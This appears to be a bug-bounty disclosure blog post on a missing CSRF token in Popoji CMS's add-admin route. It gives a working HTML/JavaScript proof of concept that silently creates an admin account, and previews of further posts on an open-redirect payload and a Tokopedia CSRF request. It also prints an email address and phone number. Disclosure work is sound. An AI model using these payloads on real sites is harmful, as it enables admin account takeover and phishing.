Missing CSRF Token On Add Admin [Popoji CMS]

Description:

This is happen because when request add admin there's no CSRF token

Step To Reproduce :

<script>function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST", "http://root/popoji/poadmin/
route.php?mod=user&act=addnew", true);
xhr.withCredentials="true";
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan
dy21%40gmail.com&no_telp=083833232954&level=1');
}
</script>
<button onclick="getMe();">Let's Rock</button>
1. Save code to .html
2. upload them to host
3. execute it.

Video : 

https://www.youtube.com/watch?v=1FXXuSiB6jo

Fix & Mitigation :

give token when request sensitive action.

Note:
them give me permission to disclose it, and they say the patch will deployed for next version. So, if you use popoji CMS, be careful, dont trust any link from unknown people and stay update your CMS. and also them give me bounty for this! yeey !

ID report :
https://www.dropbox.com/s/6d0g5j95e74yhcl/Missing-CSRF-Token-On-Add-Admin-popoji-CMS.pdf?dl=0

Comments

Post a Comment

Popular posts from this blog

Open Redirect On Codepolitan.com

Image
Open Redirect On Codepolitan.com Description :  Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. Impact : Force user go to untrusted website from codepolitan website Location of bug :  https://www.codepolitan.com/users/login?callback= Payload : http://attacker.com Reproduce : 1. Open https://www.cod...
Read more

Tokopedia - CSRF On Open Store

Image
CSRF Issue On Tokopedia,  List of bug on Tokopedia : - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html Halo, Saya menemukan sebuah bug CSRF di tokopedia Pendahuluan bug ini bisa mengubah user picture di login seal Vuln Request: POST /ajax/shop/shop-status.pl?action=event_re_open HTTP/1.1 Host: www.tokopedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 33 Origin: null Cookie: Some Cookie Connection: close action=event_re_open&s_id=[id toko]...
Read more